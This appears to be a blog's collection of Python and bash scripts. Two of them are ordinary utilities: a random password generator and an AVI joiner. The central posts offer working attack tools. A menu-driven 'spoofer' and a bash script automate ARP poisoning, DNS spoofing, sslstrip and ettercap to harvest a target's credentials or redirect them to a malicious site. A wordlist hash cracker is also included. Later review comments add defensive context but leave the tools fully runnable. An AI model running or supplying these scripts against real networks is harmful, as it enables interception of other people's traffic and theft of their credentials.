Python random password generator
Below is some code I put together to generate a random password of a user defined length.
Usage:
./pwdgen.py pw_length
#!/usr/bin/python
#
# basic random password generator
#
# omitted capital O because it looks like
# zero in some fonts
import os, sys, string, random
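# Alphabet the passwords are drawn from: lower-case letters, upper-case
# letters without "O" (easily mistaken for zero), digits and seven symbols.
# Capital "P" was absent from the earlier list although only "O" is
# documented as left out, so it is included here.
pwchars = list(
    "abcdefghijklmnopqrstuvwxyz"
    "ABCDEFGHIJKLMNPQRSTUVWXYZ"
    "1234567890"
    "!$&*@#?"
)


def pwdgen(length):
    """Return a random password of ``length`` characters taken from pwchars.

    Characters are picked with random.SystemRandom, which reads from the
    operating system's entropy source. The module-level random.choice()
    uses the Mersenne Twister, whose output can be predicted from earlier
    output and is therefore unsuitable for generating secrets.

    The result contains no separator characters. A ``length`` of zero or
    less gives an empty string.
    """
    rng = random.SystemRandom()
    return "".join(rng.choice(pwchars) for _ in range(length))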
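# Command-line entry: one argument, the password length.
scriptname = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
    print("\nUsage:")
    print("\t%s pw_length\n" % scriptname)
else:
    try:
        length = int(sys.argv[1])
    except ValueError:
        # not a number at all; handled together with non-positive values
        length = 0
    if length < 1:
        # refuse instead of printing an empty "password"
        print("\npw_length must be a positive whole number\n")
        sys.exit(1)
    # replace() is kept so the output stays correct even if pwdgen()
    # returns space-separated characters
    print("password: %s" % pwdgen(length).replace(' ', ''))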
Spoofer – Automated arp / dns poisoning
I have knocked up a little menu driven python tool called spoofer. Spoofer is a fast and easy way to poison a target and harvest their credentials or forward them to a malicious site.
Here is the code:
#!/usr/bin/python
#
# Usage: ./spoofer.py {adapter} {slave-ip} {gateway-ip}
# eg: ./spoofer.py wlan0 10.0.0.10 10.0.0.1
#
# Requirements:
# dsniff (arpspoof) - sslstrip - ettercap
#
from os import system, getuid
from sys import argv, exit
from time import sleep
class colours:
    """ANSI escape sequences used to highlight console messages."""

    # text attributes
    bold = '\033[1m'
    reset = '\033[0;0m'

    # foreground colours
    red = '\033[31m'
    green = '\033[32m'
def arp_cleanup():
    """Reverse the host changes made by menu option 1, then exit.

    Stops arpspoof, writes 0 to ip_forward, deletes the port-80 REDIRECT
    rule from the nat table and kills sslstrip. Reads the module-level
    ``adapter`` assigned by the menu code; it is not passed in.
    """
    # stop arpspoof
    print "\n[+] Stopping arpspoof"
    system('killall arpspoof')
    sleep(1)
    # set ip_forward to 0
    # NOTE(review): 0 is written unconditionally; the value the host had
    # before the run is never saved, so a machine that was routing on
    # purpose is left with forwarding off.
    print "[+] Stopping IPv4 forwarding"
    system('echo 0 > /proc/sys/net/ipv4/ip_forward')
    sleep(1)
    # clear iptables rules
    # NOTE(review): adapter comes straight from argv and is formatted into
    # a shell command line that runs as root, with no validation.
    print "[+] Flushing iptable rules"
    system("iptables -t nat -D PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 10000" % adapter)
    sleep(1)
    # stop ssl strip
    # NOTE(review): the ps | grep pipeline selects every process whose
    # command line contains "sslstrip", including the grep itself.
    print "[+] Stopping sslstrip\n"
    system('kill $(ps -ef | grep sslstrip | awk \'{print $2}\')')
    sleep(1)
    exit()
def dns_cleanup():
    """Wait for ENTER, then reverse the host changes of menu option 2 and exit.

    Stops dnsspoof and arpspoof and writes 0 to ip_forward.
    """
    raw_input('\n[+] Hit ENTER to exit')
    # stop dnsspoof
    print "\n[+] Stopping dnsspoof"
    system('killall dnsspoof')
    sleep(2)
    # stop arpspoof
    print "[+] Stopping arpspoof"
    system('killall arpspoof')
    sleep(3)
    # set ip_forward to 0
    # NOTE(review): written unconditionally; the pre-run value is not restored.
    print "[+] Stopping IPv4 forwarding\n"
    system('echo 0 > /proc/sys/net/ipv4/ip_forward')
    sleep(1)
    exit()
# Entry point: requires root and the adapter name as the first argument,
# then shows a two-item menu.
# NOTE(review): the nesting below is reconstructed; the page lost the
# original indentation.
if getuid() != 0:
    print("You need to be root (sudo %s)" % argv[0])
else:
    if len(argv) < 2:
        system('clear')
        print("\nusage: %s adapter" % argv[0])
        print("\teg: %s eth0\n" % argv[0])
    else:
        # set some variables
        adapter = argv[1]
        spooftype = 0
        # NOTE(review): raw_input() returns a string and range(1,3) is a
        # list, so this comparison is always true; the loop only ends
        # because arp_cleanup() and dns_cleanup() call exit().
        while spooftype != range(1,3):
            system('clear')
            spooftype = raw_input("\nSelect spoof type:\n\n[1] arp poison\n[2] dns spoof\n\nspoofer > ")
            # arp spoof attack
            if spooftype == "1":
                # NOTE(review): adapter, slave and gateway are formatted
                # into system() command lines without validation while the
                # script runs as root, so shell metacharacters in them are
                # interpreted by a root shell.
                slave = raw_input("\nEnter slave IP: > ")
                gateway = raw_input("Enter gateway IP: > ")
                # set rules for traffic forwarding: TCP port 80 arriving on
                # the adapter is redirected to local port 10000
                print "\n[+] Setting iptable rules"
                system("iptables -t nat -A PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 10000" % adapter)
                sleep(2)
                # start arp poison on slave / gateway
                # Defender note: this step changes the IP-to-MAC mapping the
                # target holds for the gateway; ARP monitoring on hosts and
                # dynamic ARP inspection on switches are the controls aimed
                # at it.
                print "[+] Starting arpspoof"
                system('arpspoof -i %s -t %s %s > /dev/null 2>&1 &' % (adapter, slave, gateway))
                sleep(2)
                # start sslstrip to harvest credentials
                # Defender note: only connections that start as plain HTTP
                # on port 80 pass through the REDIRECT rule above; HSTS
                # (especially preloaded) keeps a browser from making that
                # first plain-HTTP request.
                print "[+] Starting sslstrip"
                system('python /pentest/web/sslstrip/sslstrip.py -a -f -k > /dev/null 2>&1 &')
                sleep(2)
                # run ettercap against slave
                print "[+] Starting ettercap"
                system('xterm -e ettercap -T -q -i %s &' % adapter)
                sleep(2)
                # set ip forward mode
                system('echo 1 > /proc/sys/net/ipv4/ip_forward')
                sleep(1)
                print colours.bold + colours.red + "\n[+] Before exiting quit ettercap gracefully. (hit Q in the ettercap window)" + colours.reset
                raw_input('\n[+] Hit ENTER to exit')
                # clean up
                arp_cleanup()
            if spooftype == "2":
                slave = raw_input("\nEnter slave IP: > ")
                gateway = raw_input("Enter gateway IP: > ")
                # arp poison slave / gateway
                print colours.bold + colours.green + "\n[+] Poisoning..." + colours.reset
                system('arpspoof -i %s -t %s %s > /dev/null 2>&1 &' % (adapter, slave, gateway))
                sleep(2)
                # set ip forward mode
                system('echo 1 > /proc/sys/net/ipv4/ip_forward')
                sleep(1)
                # start dnsspoof
                # /root/hosts.txt is passed to dnsspoof with -f; this script
                # does not create it.
                system('dnsspoof -i %s -f /root/hosts.txt host %s and udp port 53 > /dev/null 2>&1 &' % (adapter, slave))
                # clean up
                dns_cleanup()
Spoofer relies on you having the dsniff and sslstrip tools installed. This script runs out of the box on BackTrack and requires little modification for any other linux flavours.
Python Hash Dictionary Attack
I have adapted my previous program to support sha1, sha224, sha256, sha384 and sha512 hashes, as well as md5. It is a pretty basic script that hashes each word in a wordlist and compares the result to your hash, returning the matching plaintext if it is present in your dictionary file (the hash is matched, not decrypted).
#!/usr/bin/python
#
import hashlib, readline, os, sys
# set path to your wordlist
passlist = "/path/to/pwdlist"
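def hashcrack(passlist, passhash):
    """Look up ``passhash`` in the wordlist file ``passlist``.

    The digest algorithm is chosen from the length of the hex string. Each
    line of the wordlist is hashed once with that algorithm and compared
    with ``passhash``; nothing is decrypted. Only plain, unsalted digests
    can be matched this way.

    Prints the first matching word and returns it; returns None when no
    line matches. Calls sys.exit() when the length of ``passhash`` does not
    correspond to a supported algorithm.
    """
    # hex-digest length -> hashlib constructor
    algorithms = {
        32: hashlib.md5,
        40: hashlib.sha1,
        56: hashlib.sha224,
        64: hashlib.sha256,  # previously tested against 60, which never matched
        96: hashlib.sha384,
        128: hashlib.sha512,
    }

    # hexdigest() is lower case, so normalise pasted upper-case input
    passhash = passhash.strip().lower()

    # decide the algorithm once, before the file is opened, so an invalid
    # hash is reported even for an empty wordlist and no handle is left open
    hasher = algorithms.get(len(passhash))
    if hasher is None:
        print("\n[-] Invalid hash\n")
        sys.exit()

    # binary mode: hashlib works on bytes, and the file is closed on every
    # exit path by the with-block
    with open(passlist, "rb") as pl:
        for raw in pl:
            # drop the line ending only (LF or CRLF); other whitespace is
            # part of the candidate word
            word = raw.rstrip(b"\r\n")
            if hasher(word).hexdigest() == passhash:
                found = word.decode("utf-8", "replace")
                print("\n[+] Hash found. Password is: %s\n" % found)
                return found
    return None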
if __name__ == '__main__':
    # start from an empty terminal, then read the hash to look up
    os.system('clear')
    passhash = raw_input("Please enter a hash: ").strip('\n')
    hashcrack(passlist, passhash)
Credential harvesting via ARP poison [UPDATED]
Is it me or when your programming skills improve you find yourself looking back over past programs you created and think to yourself why didn't I do that like this? I spent a fair few hours over the past weekend re-writing some old scripts to make them more efficient.
A few months ago I wrote about credential harvesting using sslstrip and arp spoof. I posted a script that helped automate the process. Here is the updated version.
#!/bin/bash
# Runs only as root. Takes three arguments: target1 target2 interface.
# NOTE(review): nesting below is reconstructed; the page lost the original
# indentation.
if [ $(whoami) == 'root' ];
then
    # cleanup: reverse the host changes made further down, then exit.
    # Runs on Ctrl-C (trap below) and after ettercap returns.
    function cleanup {
        # only a message; no command in this function stops ettercap
        echo "[+] closing ettercap"
        echo "[+] stopping sslstrip"
        # NOTE(review): matches every process whose command line contains
        # "sslstrip", including the grep itself; errors are discarded.
        kill $(ps -ef | grep sslstrip | awk '{print $2}') > /dev/null 2>&1
        echo "[+] flushing iptables"
        # NOTE(review): deletes rule number 1 of nat/PREROUTING. The rule
        # this script adds is appended with -A, so on a host that already
        # had PREROUTING rules this removes a different rule and leaves
        # the REDIRECT in place.
        iptables -t nat -D PREROUTING 1
        echo "[+] stopping arpspoof"
        killall arpspoof
        # NOTE(review): forwarding is switched off unconditionally; the
        # pre-run value is not restored.
        echo 0 > /proc/sys/net/ipv4/ip_forward
        exit 0
    }
    if [[ $# -ne 3 ]]; then
        echo "usage: $0 target1 target2 interface"
        exit 0
    fi
    clear
    trap cleanup INT
    echo "[+] enabling IPv4 forwarding"
    echo 1 > /proc/sys/net/ipv4/ip_forward
    echo "[+] ARP spoofing between $1 and $2"
    # NOTE(review): $1, $2 and $3 are expanded unquoted here and below.
    arpspoof -i $3 -t $1 $2 > /dev/null 2>&1 &
    echo "[+] setup iptables rules"
    # TCP port 80 on any interface is redirected to local port 10000
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    echo "[+] starting sslstrip"
    python /path/to/sslstrip/sslstrip.py -a -f -k &
    echo "[+] starting ettercap"
    # runs in the foreground; cleanup is called once it returns
    ettercap -T -q -i $3
    cleanup
else
    echo "You need to be root"
fi
Script to join avi files [UPDATE]
I posted a while ago with a script to join two parts of an avi file, split files are common with downloaded video. I have modified the program so it now uses command line arguments. You can download it here.
Usage: ./joinavi.sh outputfile.avi inputfile1.avi inputfile2.avi
The script:
#!/bin/bash
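# joinavi: merge two AVI parts into one file, then offer to delete the parts.
# Arguments: $1 output file, $2 first part, $3 second part.
if [ $# != 3 ];
then
    echo -e "\033[1mUsage $0 outputfile.avi inputfile1.avi inputfile2.avi\033[0m"
    exit 0
fi

# merge avi files
# Stop here when mencoder fails, so the parts are never offered for
# deletion while the merged file is missing or incomplete.
if ! mencoder -forceidx -ovc copy -oac copy -o "$1" "$2" "$3"; then
    printf '\033[1mmencoder failed; %s and %s were left untouched.\033[0m\n' "$2" "$3" >&2
    exit 1
fi

# remove original files?
# printf with %s prints file names literally; echo -e would interpret
# backslash sequences inside them.
printf '\033[1mRemove %s & %s? (Y/N):\033[0m\n' "$2" "$3"
while true; do
    # -r keeps backslashes in the answer literal; a failed read (end of
    # input) leaves the loop instead of repeating the prompt forever
    if ! read -r removefiles; then
        break
    fi
    case $removefiles in
        [Yy]* )
            printf '\033[1mremoving files %s %s...\033[0m\n' "$2" "$3"
            # "--" stops a file name that begins with "-" being read as an option
            rm -- "$2" "$3"
            break ;;
        [Nn]* )
            printf '\033[1mFile %s has been created.\033[0m\n' "$1"
            break ;;
        * )
            echo -e "\033[1mPlease answer Y or N.\033[0m" ;;
    esac
done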
It works best when copied to the /bin or /usr/local/bin directory, which lets you call it from any location.